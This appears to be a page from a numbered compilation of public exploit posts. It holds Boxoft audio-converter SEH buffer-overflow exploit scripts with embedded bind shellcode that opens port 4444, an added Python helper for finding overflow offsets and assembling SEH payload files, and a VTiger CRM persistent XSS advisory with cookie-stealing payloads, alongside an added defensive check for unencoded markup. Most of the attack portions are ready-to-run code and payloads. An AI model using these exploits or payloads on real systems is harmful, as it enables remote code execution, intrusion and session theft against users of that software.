             b"\xc7\xce\xa3\xb8\x4c\x1d\x70\xd9\x52\x08\xd0\x8e\xc5\xc6\xb1"
             b"\xfd\x74\xd6\x9b\x95\x15\x45\x40\x65\x53\x76\xdf\x32\x34\x48"
             b"\x16\xd6\xa8\xf3\x80\xc4\x30\x65\xea\x4c\xef\x56\xf5\x4d\x62"
             b"\xe2\xd1\x5d\xba\xeb\x5d\x09\x12\xba\x0b\xe7\xd4\x14\xfa\x51"
             b"\x8f\xcb\x54\x35\x56\x20\x67\x43\x57\x6d\x11\xab\xe6\xd8\x64"
             b"\xd4\xc7\x8c\x60\xad\x35\x2d\x8e\x64\xfe\x5d\xc5\x24\x57\xf6"
             b"\x80\xbd\xe5\x9b\x32\x68\x29\xa2\xb0\x98\xd2\x51\xa8\xe9\xd7"
             b"\x1e\x6e\x02\xaa\x0f\x1b\x24\x19\x2f\x0e")

nSEH = b"\xeb\x06\x90\x90"  # jmp short 6: skips the handler address into the NOPs
SEH = b"\xB8\x68\x40\x00"   # 0x004068B8 in AudioConvert.exe

buffer = b"\x41" * 4132 + nSEH + SEH + b"\x90" * 16 + shellcode

f = open("Boxotf_Audio_Converter_2.3.0.wav", "wb")
f.write(buffer)
f.close()
24. # Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
# Date: 17.09.2020
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/convert-master/setup(boxoft-convert-master).exe
# Exploit Author: Achilles
# Tested Version: 1.3.0
# Tested on: Windows 7 x64

# 1.- Run python code: Boxoft_Convert_Master.py
# 2.- Open Boxoft_Convert_Master.exe
# 3.- Click try and Batch Convert Mode
# 4.- Add Evil.wav
# 5.- And you will have a bind shell on port 4444
# 6.- Greetings go: XiDreamzzXi, Metatron

#!/usr/bin/env python
import struct

# Byte strings and a binary write so the file is identical under Python 2 and 3
buffer = b"\x41" * 4132
nseh = b"\xeb\x06\x90\x90"            # jmp short 6
seh = struct.pack('<L', 0x6d00c683)   # POP POP RET in CDRip122.dll
nops = b"\x90" * 20

# Bind shellcode, port 4444
shellcode = (b"\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33"
             b"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
             b"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
             b"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
             b"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
             b"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
             b"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
             b"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
             b"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
             b"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
             b"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
             b"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
             b"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
             b"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
             b"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
             b"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
             b"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
             b"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
             b"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
             b"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
             b"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
             b"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
             b"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
             b"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
             b"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
             b"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
             b"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
             b"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
             b"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
             b"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
             b"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
             b"\xc8\x28\x1b\xd5\x3f\x51")

payload = buffer + nseh + seh + nops + shellcode

try:
    f = open("Evil.wav", "wb")
    print("[+] Creating %s bytes evil payload.." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")
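The three SEH exploits above (posts 22, 23 and 24) build the same file layout: junk up to the handler, a 4-byte nSEH holding a `jmp short`, the handler address pointing at a POP POP RET gadget, a NOP sled, then the shellcode; the IBM TSM fragment at the top of this page packs its direct EIP overwrite with the same `struct.pack("<I", ...)`. The following is an added example and is not code from any of those posts: it generates the Metasploit-style cyclic pattern used to find such an offset, checks that the nSEH jump actually clears the handler address, screens the handler and shellcode against an msfvenom-style bad-character list, and assembles the buffer. The shellcode is a constructed INT3 sled, the 4132-byte offset and the handler addresses in the demo are the ones the Boxoft posts report, and every function name here is this example's own.

```python
import string
import struct

# Constructed stand-in for the msfvenom bind shells in the posts: an INT3 sled.
SAMPLE_SHELLCODE = b"\xcc" * 16


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2 ... Ab0 ...) used to locate the overwrite offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def dword_at(blob, index):
    """Little-endian DWORD at blob[index], i.e. what the SEH handler or EIP would hold."""
    return struct.unpack("<I", blob[index:index + 4])[0]


def pattern_offset(pattern, dword):
    """Offset inside the pattern of the DWORD seen in the handler (or EIP), -1 if absent."""
    return pattern.find(struct.pack("<I", dword))


def pack_handler(address):
    """Handler address as the 4 little-endian bytes that go into the file."""
    return struct.pack("<I", address)


def find_bad_chars(blob, badchars):
    """Bytes from the msfvenom -b list that occur in blob, sorted, as ints."""
    return sorted(set(blob) & set(badchars))


def nseh_jump_target(nseh):
    """Where the 'jmp short' in nSEH lands, relative to the start of nSEH.

    EB rel8 is two bytes long, so the target is 2 + rel8 (rel8 is signed).
    8 means the jump clears the 4-byte nSEH and the 4-byte handler address.
    """
    if len(nseh) != 4 or nseh[0] != 0xEB:
        raise ValueError("nSEH is not a 4-byte 'jmp short' stub")
    rel8 = struct.unpack("<b", nseh[1:2])[0]
    return 2 + rel8


def build_seh_overflow(offset, handler, shellcode, nops=16,
                       nseh=b"\xeb\x06\x90\x90", badchars=b""):
    """junk | nSEH | SEH | NOPs | shellcode, refusing layouts that cannot work."""
    if nseh_jump_target(nseh) < 8:
        raise ValueError("nSEH jump lands on the handler address")
    seh = pack_handler(handler)
    bad = find_bad_chars(seh + shellcode, badchars)
    if bad:
        raise ValueError("bad characters present: %s" % ", ".join("%#04x" % b for b in bad))
    return b"A" * offset + nseh + seh + b"\x90" * nops + shellcode


if __name__ == "__main__":
    # 1. Offset discovery: pretend the handler was overwritten with the pattern bytes at 4132.
    pattern = cyclic_pattern(5000)
    print("offset:", pattern_offset(pattern, dword_at(pattern, 4132)))
    # 2. Both Boxoft handler addresses carry a NUL byte; the check surfaces it before the file is written.
    for addr in (0x004068B8, 0x6d00c683):
        print("%#010x bad bytes: %s" % (addr, find_bad_chars(pack_handler(addr), b"\x00\x0a\x0d")))
    # 3. Assemble with the Convert Master offset and handler (no bad-char screening).
    blob = build_seh_overflow(4132, 0x6d00c683, SAMPLE_SHELLCODE, nops=20)
    print("file body: %d bytes, jmp lands at nSEH+%d" % (len(blob), nseh_jump_target(blob[4132:4136])))
```

Both Boxoft handler addresses (0x004068B8 in AudioConvert.exe, 0x6d00c683 in CDRip122.dll) contain a 0x00 byte, while the Audio Converter post excludes \x00 from its shellcode; `find_bad_chars` surfaces that up front so the reader can confirm, as the two posts report, that the copy tolerates a NUL in the handler address, instead of finding out after the file has been written.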
25. # Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS
# Date: 2020-11-18
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/
# Software Link: https://sourceforge.net/projects/vtigercrm/files/
# Version: v7.0

Document Title:
===============
VTiger v7.0 CRM - (To) Persistent Email Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2227

Release Date:
=============
2020-11-18

Vulnerability Laboratory ID (VL-ID):
====================================
2227

Common Vulnerability Scoring System:
====================================
4.8

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Vtiger CRM is a web application built using PHP. Choose the best CRM for your business. Custom Module & Relationship builder for VTiger is a very useful extension that allows CRM administrators to create custom modules within a few clicks. All custom modules are created following strict VTiger standards. In addition, the relationship builder allows the CRM admin to link together existing modules as well as new custom modules.

(Copy of the Homepage: https://www.vtiger.com/open-source-crm/download-open-source/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the VTiger v7.0 CRM open-source web-application.
Affected Product(s):
====================
VTExperts
Product: VTiger v7.0 - CRM (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2020-04-27: Public Disclosure (Vulnerability Laboratory)
2020-04-28: Researcher Notification & Coordination (Security Researcher)
2020-04-29: Vendor Notification 1 (Security Department)
2020-05-30: Vendor Notification 2 (Security Department)
2020-06-22: Vendor Notification 3 (Security Department)
****-**-**: Vendor Response/Feedback (Security Department)
****-**-**: Vendor Fix/Patch (Service Developer Team)
****-**-**: Security Acknowledgements (Security Department)
2020-11-18: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Full Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official VTiger v7.0 CRM open-source web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side.

The persistent cross site scripting web vulnerability is located in the `searchValue` parameter of the `Emails Compose` module. Attackers are able to inject their own malicious script code into the `To` sender input field of the email compose module to attack other user accounts. The email can be delivered to multiple recipients, which allows an attacker to insert the target email together with a malicious payload. The request method to inject is GET via searchValue and POST on compose, with a persistent attack vector.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST
[+] GET

Vulnerable Module(s):
[+] Email Compose (index.php?module=Emails)

Vulnerable Input(s):
[+] To (Sender - Email)

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged account and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability, follow the provided information and steps below to continue.

PoC: Url
http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY#

Manual steps to reproduce the vulnerability ...
1. Open the web-application ui
2. Login with a regular user role to the ui
3. Open vendors and move to the compose email form
4. Inject the malicious payload as "to" sender information, together with a valid target email
5. Send the request after composing
6. Wait until the administrator or a higher privileged targeted user clicks the email or receives it in preview
7. Successful reproduce of the cross site scripting web vulnerability!
PoC: Vulnerable Source (Execution Point)
<div class="col-lg-12"><div class="col-lg-2"><span class="pull-right">To&nbsp;<span class="redColor">*</span></span></div>
<div class="col-lg-6"><div class="select2-container select2-container-multi autoComplete sourceField select2" id="s2id_emailField" style="width: 100%;"><ul class="select2-choices ui-sortable">
<li class="select2-search-choice">
<div>IT <b>([email protected])</b></div>
<a href="#" class="select2-search-choice-close" tabindex="-1"></a></li>
<li class="select2-search-choice"><div><iframe src"evil.source" onload=alert(document.cookie)></div></iframe></div>

--- PoC Session Logs [GET] ---
http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=>"<iframe+src%3Da+onload%3Dalert(document.cookie)>&_=1587844428851
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.10 (Debian)
Content-Length: 28
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/json; charset=UTF-8
-
http://localhost:8080/vtigercrm/evil.source
Host: localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.10
Content-Length: 299
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Reference(s):
http://localhost:8080/vtigercrm/
http://localhost:8080/vtigercrm/index.php
http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=

Security Risk:
==============
The security risk of the persistent web vulnerability in the web-application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   www.vulnerability-lab.com   www.vuln-lab.com   www.vulnerability-db.com
Services:  magazine.vulnerability-lab.com   paste.vulnerability-db.com   infosec.vulnerability-db.com
Social:    twitter.com/vuln_lab   facebook.com/VulnerabilityLab   youtube.com/user/vulnerability0lab
Feeds:     vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.php
Programs:  vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php   vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
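Both stored XSS posts on this page (WonderCMS in post 21, VTiger in post 25) come down to user text being written into HTML without encoding for the context it lands in: the WonderCMS payload closes a double-quoted attribute, the VTiger payload lands as element content of a select2 choice. The example below is added here and is not code from either project. The two render functions are hypothetical templates standing in for the applications' own markup, the payloads are the ones from the two advisories (URL-decoded), and the parser-based check is the assertion a regression test would make against rendered output. It goes slightly beyond the posts by covering both the attribute and the element-content context in one place.

```python
import html
from html.parser import HTMLParser

# Payloads from the two advisories, URL-decoded (post 21 request body, post 25 searchValue).
WONDERCMS_PAYLOAD = 'HemantSoloHacker"><img src=x onerror=confirm(1)>'
VTIGER_PAYLOAD = '>"<iframe src=a onload=alert(document.cookie)>'


def render_attribute(value, encode):
    """Hypothetical WonderCMS-style template: user text inside a double-quoted attribute."""
    if encode:
        value = html.escape(value, quote=True)   # & < > " ' are all encoded
    return '<meta name="description" content="%s">' % value


def render_element(value, encode):
    """Hypothetical VTiger-style template: recipient text as the content of a select2 choice."""
    if encode:
        value = html.escape(value, quote=False)  # & < > encoded; quotes are harmless in text
    return '<li class="select2-search-choice"><div>%s</div></li>' % value


class ActiveContentFinder(HTMLParser):
    """Records constructs that run script: on* handlers, javascript: URLs, script-like tags."""
    ACTIVE_TAGS = {"script", "iframe", "object", "embed"}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in self.ACTIVE_TAGS:
            self.findings.append((tag, None))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append((tag, name))
            elif name in ("src", "href") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append((tag, name))


def active_content(markup):
    """(tag, attribute-or-None) for every script-bearing construct the browser would see."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    cases = (("WonderCMS description", render_attribute, WONDERCMS_PAYLOAD),
             ("VTiger To field", render_element, VTIGER_PAYLOAD))
    for label, render, payload in cases:
        for encode in (False, True):
            print(label, "encoded:" if encode else "raw:", active_content(render(payload, encode)))
```

The check is deliberately run on the rendered markup rather than on the stored value: both applications accept the text (WonderCMS keeps it as the page description, VTiger echoes it back through the BasicAjax JSON response), so the only place the defect is visible is at the point where that text becomes HTML.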